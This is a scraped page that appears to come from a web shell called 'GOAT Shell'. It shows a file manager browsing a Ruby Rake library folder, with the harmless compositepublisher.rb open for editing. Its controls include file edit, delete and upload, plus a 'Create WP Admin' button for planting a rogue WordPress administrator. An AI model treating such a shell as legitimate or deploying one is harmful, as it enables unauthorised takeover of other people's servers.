🐐 GOAT Shell
Current path:
opt
/
alt
/
ruby21
/
lib64
/
ruby
/
2.1.0
/
rake
/
contrib
/
👤 Create WP Admin
⬆️
Go up: rake
✏️ Editing: compositepublisher.rb
module Rake # Manage several publishers as a single entity. class CompositePublisher def initialize @publishers = [] end # Add a publisher to the composite. def add(pub) @publishers << pub end # Upload all the individual publishers. def upload @publishers.each { |p| p.upload } end end end
Save
📄
compositepublisher.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
ftptools.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
publisher.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
rubyforgepublisher.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
sshpublisher.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📄
sys.rb
|
✏️ Edit
|
✏️ Rename
|
🗑️ Delete
📤 Upload File
Upload
📁 Create Folder
Create Folder